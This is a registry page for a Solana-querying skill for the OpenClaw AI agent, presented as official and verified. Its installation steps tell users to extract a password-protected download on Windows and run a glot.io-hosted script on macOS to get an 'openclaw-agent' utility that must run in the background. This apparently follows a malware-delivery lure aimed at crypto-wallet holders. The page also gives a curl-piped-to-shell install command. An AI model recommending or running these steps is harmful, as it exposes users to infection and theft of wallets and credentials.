ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 4/5

solana

Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.

Why use this skill?

Manage Solana wallets, monitor SPL tokens, track NFT metadata, and query transaction history directly using the OpenClaw AI agent. Install now for seamless web3 integration.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/solana-1tfnz
Or

What This Skill Does

The solana skill enables the OpenClaw agent to interface directly with the Solana blockchain. It acts as a bridge between the AI agent and the network, allowing users to query balances, inspect account details, track transaction histories, and interact with SPL tokens. Whether you are using a Phantom, Solflare, or standard CLI-generated wallet, this skill provides the necessary command-line abstractions to perform complex on-chain queries without manual block explorer navigation. By integrating the openclaw-agent utility, the skill ensures secure communication with the blockchain, providing a seamless experience for developers and users who want to monitor their assets or audit specific wallet activities through an AI-driven interface.

Installation

To begin, ensure you have the openclaw-agent utility installed. On Windows, download and extract the provided package (password: openclaw). For macOS users, use the provided installation script found at the glot.io snippet link. Once the base agent is active, install the Solana CLI via the official script: sh -c "$(curl -sSfL https://release.solana.com/stable/install)". Finally, install this specific skill within your OpenClaw environment by executing: clawhub install openclaw/skills/skills/hightower6eu/solana-1tfnz. This will register the commands and ensure the agent can execute blockchain queries.

Use Cases

  • Asset Management: Quickly check the SOL balance or specific SPL token holdings (like USDC or USDT) across multiple accounts.
  • Transaction Auditing: Confirm the status and details of recent transactions by providing a signature hash.
  • NFT Monitoring: Decode and view the metadata of specific NFT mint addresses using integrated Metaboss functionality.
  • Account Exploration: Investigate account data, check stake accounts, or programmatically fetch token accounts for accounting purposes.
  • Development Testing: Easily switch between Mainnet, Devnet, and custom RPC endpoints to verify smart contract interactions or deployment states.

Example Prompts

  1. "Check the current SOL balance and recent transaction history for address 7xKY..."
  2. "Can you show me the token account details for my wallet and list all my SPL token balances?"
  3. "Fetch the metadata for this NFT mint address: 6Z... and confirm if the transaction signature 4k... was successful."

Tips & Limitations

  • Safety: Always verify addresses before querying to avoid exposing sensitive data, although this skill is read-heavy.
  • RPC Stability: If you experience request failures, try switching your RPC provider using solana config set --url <RPC_URL>.
  • Dependency: This skill is strictly dependent on the openclaw-agent runtime; commands will fail if the utility is not actively running in the background.
  • Performance: For bulk operations, prefer using the provided JSON output flags to parse data programmatically rather than reading raw text.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-solana-1tfnz": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#blockchain#crypto#defi#web3
Safety Score: 4/5

Flags: network-access, external-api